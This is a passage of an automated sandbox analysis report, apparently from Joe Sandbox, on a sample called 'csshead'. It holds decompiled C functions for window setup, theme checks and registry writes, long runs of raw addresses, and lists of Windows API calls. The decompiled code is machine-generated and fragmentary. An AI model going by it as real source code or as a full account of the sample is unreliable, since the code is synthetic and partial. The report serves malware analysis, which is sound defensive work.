    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 91%
    			E00408AA4(void* __edx, void* __eflags) {
    				struct _WNDCLASSEXA _v52;
    				struct tagMSG _v80;
    				char _v97;
    				void* _t14;
    
    				E00401164(E004010B4(E00401164(E004010B4(_t14, __edx),  &_v97),  &_v97),  &(( &_v97)[8]));
    				E00401258( &_v52, 0x30);
    				_v52.cbSize = 0x30;
    				_v52.hInstance = 0;
    				_v52.lpszClassName =  &_v97;
    				_v52.lpfnWndProc = E00408A48;
    				RegisterClassExA( &_v52);
    				 *0x40a574 = CreateWindowExA(0,  &_v97, 0, 0, 0x80000000, 0x80000000, 0x80000000, 0x80000000, 0, 0, 0, 0);
    				if( *0x40a574 != 0) {
    					while(GetMessageA( &_v80, 0, 0, 0) != 0) {
    						TranslateMessage( &_v80);
    						DispatchMessageA( &_v80);
    					}
    				}
    				_push(0);
    				return RtlExitUserThread();
    			}

    APIs
    • RegisterClassExA.USER32(00000030), ref: 00408AF1
    • CreateWindowExA.USER32(00000000,?,00000000,00000000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00408B1D
    • TranslateMessage.USER32(?), ref: 00408B37
    • DispatchMessageA.USER32(?), ref: 00408B41
    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00408B51
    • RtlExitUserThread.NTDLL(00000000), ref: 00408B5D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 64%
    			E00410C00(void* __edi, void* __esi) {
    				char _v4;
    				char _v8;
    				_Unknown_base(*)()* _t10;
    				_Unknown_base(*)()* _t14;
    				struct HINSTANCE__* _t22;
    
    				_t16 = 0;
    				_v8 = 0;
    				if(L00410B40( &_v8,  &_v4) < 0 || _v8 < 6) {
    					return _t16;
    				} else {
    					_t22 = LoadLibraryA("uxtheme.dll");
    					if(_t22 == 0) {
    						return 0;
    					} else {
    						_t10 = GetProcAddress(_t22, "IsThemeActive");
    						if(_t10 != 0 &&  *_t10() != 0) {
    							_t14 = GetProcAddress(_t22, "IsAppThemed");
    							if(_t14 != 0 &&  *_t14() != 0) {
    								_t16 = 1;
    							}
    						}
    						FreeLibrary(_t22);
    						return _t16;
    					}
    				}
    			}

    APIs
    • LoadLibraryA.KERNEL32(uxtheme.dll), ref: 00410C2D
    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 00410C46
    • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 00410C58
    • FreeLibrary.KERNEL32(00000000), ref: 00410C67
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 90%
    			E004075F0(intOrPtr __ecx) {
    				void* __edi;
    				signed int _t76;
    				void* _t77;
    				signed int _t80;
    				signed int _t82;
    				int _t83;
    				signed int _t89;
    				CHAR* _t90;
    				signed int _t91;
    				char _t92;
    				signed int _t97;
    				void* _t100;
    				signed int _t101;
    				signed int _t106;
    				signed char _t110;
    				char* _t114;
    				signed char _t121;
    				intOrPtr _t125;
    				signed char _t127;
    				char _t141;
    				void* _t156;
    				void* _t160;
    				void* _t170;
    				char* _t171;
    				int _t173;
    				signed int* _t176;
    				signed int _t177;
    				signed int _t178;
    				CHAR* _t179;
    				signed int _t182;
    				void* _t183;
    				void* _t184;
    				void* _t187;
    
    				_t183 = _t184 - 0x6c;
    				L00422C50(0x1110);
    				_t125 = __ecx;
    				_t177 = 0;
    				 *((intOrPtr*)(_t183 + 0x68)) = __ecx;
    				 *(_t183 + 0x64) = 0;
    				_t76 = L00404250(__ecx, _t183 - 0x10a4);
    				if(_t76 < 0) {
    					L49:
    					return _t76;
    				} else {
    					_t160 = _t183 - 0x10a4;
    					_t77 = E00404090(_t160, _t183 + 0x64);
    					_t187 = _t184 + 8;
    					if(_t77 != 0) {
    						L004041F0(_t125);
    						_t76 = L00404250(_t125, _t183 - 0x10a4);
    						__eflags = _t76;
    						if(_t76 < 0) {
    							goto L49;
    						} else {
    							_t80 =  *(_t183 + 0x64) & 0x0000ffff;
    							__eflags = _t80 - 0x13;
    							if(__eflags > 0) {
    								__eflags = _t80 - 0x4008;
    								if(_t80 != 0x4008) {
    									goto L48;
    								} else {
    									_t83 = lstrlenA(_t183 - 0x10a4);
    									 *(_t183 - 0xa4) = 0;
    									L004068A0(_t183 - 0xa4, _t170, _t83 + 2);
    									_t171 =  *(_t183 - 0xa4);
    									__eflags = _t171;
    									if(_t171 == 0) {
    										_t178 = 0xe;
    									} else {
    										__eflags =  *(_t183 - 0x10a4);
    										_t179 = _t183 - 0x10a4;
    										if( *(_t183 - 0x10a4) != 0) {
    											do {
    												_t90 = CharNextA(_t179);
    												_t141 =  *_t179;
    												__eflags = _t141 - 0x5c;
    												if(_t141 != 0x5c) {
    													L37:
    													 *_t171 = _t141;
    													_t91 = IsDBCSLeadByte( *_t179 & 0x000000ff);
    													__eflags = _t91;
    													if(_t91 == 0) {
    														L40:
    														_t171 =  &(_t171[1]);
    														_t179 =  &(_t179[1]);
    														__eflags = _t179;
    														goto L41;
    													} else {
    														_t92 = _t179[1];
    														_t179 =  &(_t179[1]);
    														_t171 =  &(_t171[1]);
    														__eflags = _t92;
    														if(_t92 != 0) {
    															 *_t171 = _t92;
    															goto L40;
    														}
    													}
    												} else {
    													__eflags =  *_t90 - 0x30;
    													if( *_t90 != 0x30) {
    														goto L37;
    													} else {
    														 *_t171 = 0;
    														_t171 =  &(_t171[1]);
    														_t179 = CharNextA(_t90);
    														goto L41;
    													}
    												}
    												break;
    												L41:
    												__eflags =  *_t179;
    											} while ( *_t179 != 0);
    											_t125 =  *((intOrPtr*)(_t183 + 0x68));
    										}
    										 *_t171 = 0;
    										_push( *(_t183 - 0xa4));
    										_push( *(_t183 + 0x78));
    										_t89 = L00403FA0();
    										_t171 =  *(_t183 - 0xa4);
    										_t178 = _t89;
    									}
    									__eflags = _t171 - _t183 - 0xa0;
    									if(_t171 != _t183 - 0xa0) {
    										E004049C0(_t183 - 0xa4);
    									}
    									goto L19;
    								}
    							} else {
    								if(__eflags == 0) {
    									 *((intOrPtr*)(_t183 + 0x68)) = 0;
    									 *(_t183 + 0x64) = lstrlenA(_t183 - 0x10a4) + 1;
    									_t97 = E004036F0(_t183 + 0x64, lstrlenA(_t183 - 0x10a4) + 1, 2);
    									_t187 = _t187 + 0xc;
    									__eflags = _t97;
    									if(_t97 < 0) {
    										L28:
    										L00404940(_t183 + 0x68);
    										return 0x8007000e;
    									} else {
    										_t180 =  *(_t183 + 0x64);
    										__eflags =  *(_t183 + 0x64) - 0x400;
    										if(__eflags > 0) {
    											L26:
    											_t100 = L00405440(_t183 + 0x68, _t170, _t180);
    										} else {
    											_t106 = L00404C30(_t160, __eflags, _t180);
    											_t187 = _t187 + 4;
    											__eflags = _t106;
    											if(_t106 == 0) {
    												goto L26;
    											} else {
    												L00422450(_t180);
    												_t100 = _t187;
    											}
    										}
    										_t101 = E00401810(_t100, _t183 - 0x10a4, _t180 >> 1, 3);
    										__eflags = _t101;
    										if(_t101 != 0) {
    											 *0x4332ec(_t101, 0, 0, _t183 + 0x60);
    											_t178 = L00403F40( *(_t183 + 0x74),  *(_t183 + 0x78),  *((intOrPtr*)(_t183 + 0x60)));
    											L00404940(_t183 + 0x68);
    											goto L19;
    										} else {
    											goto L28;
    										}
    									}
    								} else {
    									__eflags = _t80 - 8;
    									if(_t80 == 8) {
    										_push(1);
    										_push(_t183 - 0x10a4);
    										_t178 = L00403F60( *(_t183 + 0x74),  *(_t183 + 0x78));
    										goto L19;
    									} else {
    										__eflags = _t80 - 0x11;
    										if(_t80 != 0x11) {
    											L48:
    											_t82 = L00404250(_t125,  *((intOrPtr*)(_t183 + 0x7c)));
    											__eflags = _t82 - _t177;
    											_t76 = _t82 & (0 | _t82 - _t177 >= 0x00000000) - 0x00000001;
    											__eflags = _t76;
    											goto L49;
    										} else {
    											_t110 = lstrlenA(_t183 - 0x10a4);
    											_t127 = _t110;
    											__eflags = _t127 & 0x00000001;
    											if((_t127 & 0x00000001) != 0) {
    												L12:
    												return 0x80004005;
    											} else {
    												asm("cdq");
    												_t173 = _t110 - _t160 >> 1;
    												_t182 = 0;
    												 *(_t183 + 0x64) = _t173;
    												 *(_t183 - 0xa4) = 0;
    												L004068A0(_t183 - 0xa4, _t173, _t173);
    												_t114 =  *(_t183 - 0xa4);
    												__eflags = _t114;
    												if(_t114 != 0) {
    													E00422840(_t114, 0, _t173);
    													_t187 = _t187 + 0xc;
    													__eflags = _t127;
    													if(_t127 > 0) {
    														do {
    															_t176 =  &(( *(_t183 - 0xa4))[_t182 >> 1]);
    															_t121 = E00404140( *(_t183 + _t182 - 0x10a4) & 0x000000ff);
    															_t156 = (_t182 & 0x00000001) + (_t182 & 0x00000001);
    															_t182 = _t182 + 1;
    															_t187 = _t187 + 4;
    															 *_t176 =  *_t176 | _t121 << 0x00000004 - _t156 + _t156;
    															__eflags = _t182 - _t127;
    														} while (_t182 < _t127);
    														_t173 =  *(_t183 + 0x64);
    													}
    													_t178 = RegSetValueExA( *( *(_t183 + 0x74)),  *(_t183 + 0x78), 0, 3,  *(_t183 - 0xa4), _t173);
    													__eflags =  *(_t183 - 0xa4) - _t183 - 0xa0;
    													if( *(_t183 - 0xa4) != _t183 - 0xa0) {
    														E004049C0(_t183 - 0xa4);
    													}
    													_t125 =  *((intOrPtr*)(_t183 + 0x68));
    													L19:
    													__eflags = _t178;
    													if(_t178 == 0) {
    														_t177 = 0;
    														__eflags = 0;
    														goto L48;
    													} else {
    														return E00403AC0(_t178);
    													}
    												} else {
    													__eflags = _t183 != 0xa0;
    													if(_t183 != 0xa0) {
    														E004049C0(_t183 - 0xa4);
    													}
    													goto L12;
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					} else {
    						return 0x80020009;
    					}
    				}
    			}
    0x004075f1
    0x004075fa
    0x00407608
    0x0040760a
    0x0040760d
    0x00407610
    0x00407613
    0x0040761a
    0x0040794b
    0x00407958
    0x00407620
    0x00407624
    0x0040762b
    0x00407630
    0x00407635
    0x0040764e
    0x0040765c
    0x00407661
    0x00407663
    0x00000000
    0x00407669
    0x00407669
    0x0040766d
    0x00407670
    0x00407863
    0x00407868
    0x00000000
    0x0040786e
    0x00407875
    0x00407885
    0x0040788b
    0x00407890
    0x00407896
    0x00407898
    0x00407911
    0x0040789a
    0x0040789a
    0x004078a1
    0x004078a7
    0x004078b0
    0x004078b1
    0x004078b3
    0x004078b5
    0x004078b8
    0x004078ca
    0x004078ca
    0x004078d0
    0x004078d6
    0x004078d8
    0x004078e5
    0x004078e5
    0x004078e6
    0x004078e6
    0x00000000
    0x004078da
    0x004078da
    0x004078dd
    0x004078de
    0x004078df
    0x004078e1
    0x004078e3
    0x00000000
    0x004078e3
    0x004078e1
    0x004078ba
    0x004078ba
    0x004078bd
    0x00000000
    0x004078bf
    0x004078bf
    0x004078c3
    0x004078c6
    0x00000000
    0x004078c6
    0x004078bd
    0x00000000
    0x004078e7
    0x004078e7
    0x004078e7
    0x004078ec
    0x004078ec
    0x004078f2
    0x004078fd
    0x004078fe
    0x00407902
    0x00407907
    0x0040790d
    0x0040790d
    0x0040791c
    0x0040791e
    0x0040792a
    0x0040792a
    0x00000000
    0x0040791e
    0x00407676
    0x00407676
    0x004077b6
    0x004077c7
    0x004077ca
    0x004077cf
    0x004077d2
    0x004077d4
    0x00407818
    0x0040781b
    0x00407832
    0x004077d6
    0x004077d6
    0x004077d9
    0x004077df
    0x004077f9
    0x004077fd
    0x004077e1
    0x004077e2
    0x004077e7
    0x004077ea
    0x004077ec
    0x00000000
    0x004077ee
    0x004077f0
    0x004077f5
    0x004077f5
    0x004077ec
    0x0040780f
    0x00407814
    0x00407816
    0x0040783e
    0x00407857
    0x00407859
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00407816
    0x0040767c
    0x0040767c
    0x0040767f
    0x00407799
    0x004077a1
    0x004077ab
    0x00000000
    0x00407685
    0x00407685
    0x00407688
    0x00407936
    0x0040793c
    0x00407943
    0x00407949
    0x00407949
    0x00000000
    0x0040768e
    0x00407695
    0x0040769b
    0x0040769d
    0x004076a0
    0x004076df
    0x004076f1
    0x004076a2
    0x004076a2
    0x004076a7
    0x004076a9
    0x004076b2
    0x004076b5
    0x004076bb
    0x004076c0
    0x004076c6
    0x004076c8
    0x004076f7
    0x004076fc
    0x004076ff
    0x00407701
    0x00407703
    0x0040770f
    0x00407716
    0x00407720
    0x0040772e
    0x0040772f
    0x00407732
    0x00407734
    0x00407734
    0x00407738
    0x00407738
    0x00407757
    0x0040775f
    0x00407765
    0x0040776d
    0x0040776d
    0x00407772
    0x00407775
    0x00407775
    0x00407777
    0x00407934
    0x00407934
    0x00000000
    0x0040777d
    0x00407793
    0x00407793
    0x004076ca
    0x004076d0
    0x004076d2
    0x004076da
    0x004076da
    0x00000000
    0x004076d2
    0x004076c8
    0x004076a0
    0x00407688
    0x0040767f
    0x00407676
    0x00407670
    0x00407637
    0x00407649
    0x00407649
    0x00407635

    APIs
      • Part of subcall function 00404250: CharNextA.USER32(?,?,?,?,?,0040913B,?), ref: 0040427F
      • Part of subcall function 00404250: CharNextA.USER32(00000000,?,?,?,?,?,0040913B,?), ref: 00404290
      • Part of subcall function 00404250: CharNextA.USER32(00000000,?,?,?,?,?,0040913B,?), ref: 0040429F
      • Part of subcall function 00404250: CharNextA.USER32(?,?,?,?,?,?,0040913B,?), ref: 004042A6
      • Part of subcall function 00404250: CharNextA.USER32(?,?,?,?,?,?,0040913B,?), ref: 004042E5
      • Part of subcall function 00404250: CharNextA.USER32(?,?,?,?,?,0040913B,?), ref: 0040430E
      • Part of subcall function 00404090: lstrcmpiA.KERNEL32(?,00004008), ref: 0040410E
      • Part of subcall function 004041F0: CharNextA.USER32(?,?,?,00404258,?,0040913B,?), ref: 0040421C
    • lstrlenA.KERNEL32(?,?), ref: 00407695
    • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 00407751
      • Part of subcall function 00403F60: lstrlenA.KERNEL32(?), ref: 00403F75
      • Part of subcall function 00403F60: RegSetValueExA.ADVAPI32(?,?,00000000,?,?,00000001), ref: 00403F8D
    • lstrlenA.KERNEL32(?,?), ref: 004077B9
      • Part of subcall function 00401810: MultiByteToWideChar.KERNEL32(00000001,00000000,00000003,000000FF,?,00000001,00000001,00401D0B,?,?,00000001,00000003), ref: 00401835
    • 80000115.OLEAUT32(00000000,00000000,00000000,?,00000000,?,?,00000003,?), ref: 0040783E
      • Part of subcall function 00403F40: RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 00403F53
    • lstrlenA.KERNEL32(?,?), ref: 00407875
    • CharNextA.USER32(00000000), ref: 004078B1
    • CharNextA.USER32(00000000), ref: 004078C4
    • IsDBCSLeadByte.KERNEL32 ref: 004078D0
      • Part of subcall function 00403FA0: lstrlenA.KERNEL32(?), ref: 00403FC4
      • Part of subcall function 00403FA0: RegSetValueExA.ADVAPI32(?,?,00000000,00000007,?,00000000), ref: 00403FE2
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • RtlEnterCriticalSection.NTDLL(00442A20), ref: 00415B87
    • RegisterClipboardFormatA.USER32(00436308), ref: 00415B9B
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00415BA7
    • GetCurrentProcessId.KERNEL32 ref: 00415BCF
    • IsWindow.USER32 ref: 00415BE7
    • GetCurrentThreadId.KERNEL32 ref: 00415C0D
    • CallNextHookEx.USER32(?,?,?,?), ref: 00415C62
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00415C7C
      • Part of subcall function 00413B70: RtlEnterCriticalSection.NTDLL(00442A20), ref: 00413B84
      • Part of subcall function 00413B70: RegisterClipboardFormatA.USER32(00436308), ref: 00413B98
      • Part of subcall function 00413B70: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00413BA4
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetCapture.USER32 ref: 00411DE7
    • ClientToScreen.USER32(?,?), ref: 00411E1D
    • GetWindowRect.USER32(?,?), ref: 00411E42
    • ReleaseCapture.USER32 ref: 00411E5E
      • Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382
    • PtInRect.USER32(?,?,?), ref: 00411EBD
    • SendMessageA.USER32(?,00000112,0000F020,000000FD), ref: 00411EE4
    • SendMessageA.USER32(?,00000112,0000F120,00000000), ref: 00411F07
    • SendMessageA.USER32(?,00000112,0000F060,00000000), ref: 00411F2A
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 00425D30: TlsGetValue.KERNEL32(00000000,00425E89,?,?,00417F96,00000009), ref: 00425D39
      • Part of subcall function 00425D30: RtlDecodePointer.NTDLL ref: 00425D4B
      • Part of subcall function 00425D30: TlsSetValue.KERNEL32(00000000,?,?,00417F96,00000009), ref: 00425D5A
    • ___fls_getvalue@4.LIBCMT ref: 00423C62
      • Part of subcall function 00425D10: TlsGetValue.KERNEL32(?,?,00423C67,00000000), ref: 00425D1E
    • ___fls_setvalue@8.LIBCMT ref: 00423C75
      • Part of subcall function 00425D64: RtlDecodePointer.NTDLL(?), ref: 00425D75
    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00423C7E
    • RtlExitUserThread.NTDLL(00000000), ref: 00423C85
    • GetCurrentThreadId.KERNEL32 ref: 00423C8B
      • Part of subcall function 00425F05: InterlockedDecrement.KERNEL32(?), ref: 00425FA3
      • Part of subcall function 00423C10: __getptd.LIBCMT ref: 00423C1C
      • Part of subcall function 00423C10: __XcptFilter.LIBCMT ref: 00423C3D
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C
    • __getptd.LIBCMT ref: 00423CF4
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
      • Part of subcall function 00425DBE: GetModuleHandleW.KERNEL32(00436FF4,0043CE18,00000008,00425EC6,00000000,00000000,?,?,00417F96,00000009), ref: 00425DCF
      • Part of subcall function 00425DBE: InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10
    • CreateThread.KERNEL32(?,?,00423C51,00000000,?,?), ref: 00423D2B
    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00423D35
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetCurrentProcess.KERNEL32 ref: 0041F3EA
    • FlushInstructionCache.KERNEL32(00000000), ref: 0041F3F1
    • GetCurrentThreadId.KERNEL32 ref: 0041F405
    • RtlEnterCriticalSection.NTDLL(00442B64), ref: 0041F413
    • RtlLeaveCriticalSection.NTDLL(00442B64), ref: 0041F42D
    • DialogBoxParamA.USER32(00442B94,00000064,?,00408EC0,?), ref: 0041F44B
    • RaiseException.KERNEL32(C0000005,00000001,00000000,00000000), ref: 0041F470
      • Part of subcall function 00421F2E: GetProcessHeap.KERNEL32(00000000,0000000D,?,?,004124FE), ref: 00421EB2
      • Part of subcall function 00421F2E: RtlAllocateHeap.NTDLL(00000000), ref: 00421EB9
      • Part of subcall function 00421F2E: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,004124FE), ref: 00421EDD
      • Part of subcall function 00421F2E: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004124FE), ref: 00421F05
      • Part of subcall function 00421F2E: RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 00421F1C
    • SetLastError.KERNEL32(0000000E,00000000,0041F69F,00000000), ref: 0041F458
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetMenu.USER32(?), ref: 0042173B
      • Part of subcall function 00413BC0: IsMenu.USER32(?), ref: 00413BD9
      • Part of subcall function 00413BC0: DestroyMenu.USER32(?), ref: 00413C12
      • Part of subcall function 00413BC0: GetMenuItemCount.USER32(?), ref: 00413C6C
      • Part of subcall function 00413BC0: GetVersionExA.KERNEL32(?,?,00000000,00000090,?,00000000,00000030), ref: 00413CDE
      • Part of subcall function 00413BC0: GetMenuItemInfoA.USER32 ref: 00413D39
      • Part of subcall function 00413BC0: lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,0000002C), ref: 00413D44
      • Part of subcall function 00413BC0: SetMenuItemInfoA.USER32(?,00000000,00000001,0000002C), ref: 00413D63
      • Part of subcall function 00413BC0: InvalidateRect.USER32(?,00000000,00000001), ref: 00413E22
      • Part of subcall function 00413BC0: UpdateWindow.USER32(?), ref: 00413E2C
      • Part of subcall function 0041F4A0: FindResourceA.KERNEL32(00442B94,?,000000F1), ref: 0041F4B8
      • Part of subcall function 0041F4A0: LoadResource.KERNEL32(00442B94,00000000), ref: 0041F4CE
      • Part of subcall function 0041F4A0: LockResource.KERNEL32(00000000), ref: 0041F4D9
      • Part of subcall function 0041F4A0: LoadImageA.USER32(00442B94,?,00000000,00000000,00000000,00002040), ref: 0041F596
      • Part of subcall function 0041F4A0: LoadBitmapA.USER32(00442B94,?), ref: 0041F5B3
      • Part of subcall function 0041F4A0: DeleteObject.GDI32(00000000), ref: 0041F623
      • Part of subcall function 0041F4A0: DeleteObject.GDI32(00000000), ref: 0041F652
    • SetMenu.USER32(?,00000000), ref: 00421766
      • Part of subcall function 0041EBA0: FindResourceA.KERNEL32(00442B94,?,000000F1), ref: 0041EBC5
      • Part of subcall function 0041EBA0: LoadResource.KERNEL32(00442B94,00000000), ref: 0041EBDE
      • Part of subcall function 0041EBA0: LockResource.KERNEL32(00000000), ref: 0041EBE9
      • Part of subcall function 0041EBA0: CreateWindowExA.USER32(00000000,00436780,00000000,?,00000000,00000000,00000064,00000064,?,?,00442B90,00000000), ref: 0041ECD8
      • Part of subcall function 0041EBA0: GetStockObject.GDI32(0000000D), ref: 0041ED26
      • Part of subcall function 0041EBA0: GetObjectA.GDI32(?,0000003C,?), ref: 0041ED50
      • Part of subcall function 0041EBA0: FindResourceA.KERNEL32(00442B94,?,00000002), ref: 0041ED77
      • Part of subcall function 0041EBA0: LoadResource.KERNEL32(?,00000000), ref: 0041ED83
      • Part of subcall function 0041EBA0: LockResource.KERNEL32(00000000), ref: 0041ED8A
    • CreateWindowExA.USER32(00000000,00436790,00000000,56002640,00000000,00000000,00000064,00000064,?,0000E800,00442B90,00000000), ref: 004217B3
      • Part of subcall function 00410C90: GetVersionExA.KERNEL32(?,00000000,00000090), ref: 00410CBD
    • GetWindowRect.USER32(00000000,00000000), ref: 004218EB
    • GetWindowRect.USER32(00000000,?), ref: 00421A14
    • LoadStringA.USER32(00442B94,0000E001,?,00000080), ref: 00421A99
      • Part of subcall function 0041EA50: SetWindowLongA.USER32(?,000000F0,00000000), ref: 0041EABB
      • Part of subcall function 0041EA50: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,0000003F), ref: 0041EAD1
      • Part of subcall function 0041EA50: CreateWindowExA.USER32(00000200,004367A0,00000000,56000001,00000000,00000000,00000001,00000001,?,?,00442B90, 4C), ref: 0041EB01
      • Part of subcall function 0041EA50: BringWindowToTop.USER32(00000000), ref: 0041EB18
      • Part of subcall function 0041E9C0: GetWindowLongA.USER32(?,000000FC), ref: 0041E9F8
      • Part of subcall function 0041E9C0: SetWindowLongA.USER32(?,000000FC,?), ref: 0041EA12
    • GetCurrentThreadId.KERNEL32 ref: 00421BD2
      • Part of subcall function 0041F120: RtlEnterCriticalSection.NTDLL(00442A20), ref: 0041F12F
      • Part of subcall function 0041F120: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F156
      • Part of subcall function 0041F120: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F16C
      • Part of subcall function 0041F120: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F189
      • Part of subcall function 0041F120: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,00000000,00421BE3,00000000,?,?,?,?,?,?,00000000,00000404), ref: 0041F1A2
      • Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetWindowRect.USER32(?,?), ref: 004132D8
      • Part of subcall function 004112B0: SetRect.USER32(?,?,?,?,?), ref: 00411304
      • Part of subcall function 004112B0: SetRect.USER32(00000000,?,?,?,?), ref: 00411320
      • Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382
    • GetSystemMenu.USER32(?,00000000), ref: 00413387
      • Part of subcall function 00411910: GetMonitorInfoA.USER32 ref: 0041196C
    • TrackPopupMenu.USER32(?,?,00000000,?,00000000,?,00000000), ref: 004133DC
    • OffsetRect.USER32(?,?,?), ref: 004133F3
    • PtInRect.USER32(?,00000000,?), ref: 0041344A
    • SendMessageA.USER32(?,00000112,00000000,00000000), ref: 00413482
    • SetCapture.USER32(?), ref: 00413501
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 004117C0: GetFocus.USER32 ref: 004117D2
      • Part of subcall function 004117C0: SetFocus.USER32(?), ref: 004117E2
    • GetFocus.USER32 ref: 0041574E
    • IsWindow.USER32(?), ref: 00415761
    • SendMessageA.USER32(?,00000448,000000FF,00000000), ref: 0041577C
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 004158D1
      • Part of subcall function 00411530: GetClientRect.USER32(?,?), ref: 00411569
      • Part of subcall function 00411530: GetMenuItemCount.USER32(?), ref: 00411573
      • Part of subcall function 00411440: GetClientRect.USER32(?,?), ref: 00411479
      • Part of subcall function 00411440: GetMenuItemCount.USER32(?), ref: 00411498
      • Part of subcall function 00411630: GetParent.USER32(?), ref: 00411640
      • Part of subcall function 00411630: SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00411656
      • Part of subcall function 00411630: GetVersionExA.KERNEL32(?), ref: 0041169F
      • Part of subcall function 00411630: LoadLibraryA.KERNEL32(00436280), ref: 004116D6
      • Part of subcall function 00411630: GetProcAddress.KERNEL32(00000000,00436270), ref: 004116EF
      • Part of subcall function 00411630: FreeLibrary.KERNEL32(00000000), ref: 0041170A
      • Part of subcall function 00411630: SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 0041174F
    • GetFocus.USER32 ref: 004158E6
    • IsWindow.USER32(?), ref: 004158F5
    • SendMessageA.USER32(?,00000447,00000000,00000000), ref: 0041590C
      • Part of subcall function 004140E0: SetFocus.USER32(?), ref: 00414123
      • Part of subcall function 004140E0: SendMessageA.USER32 ref: 00414141
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
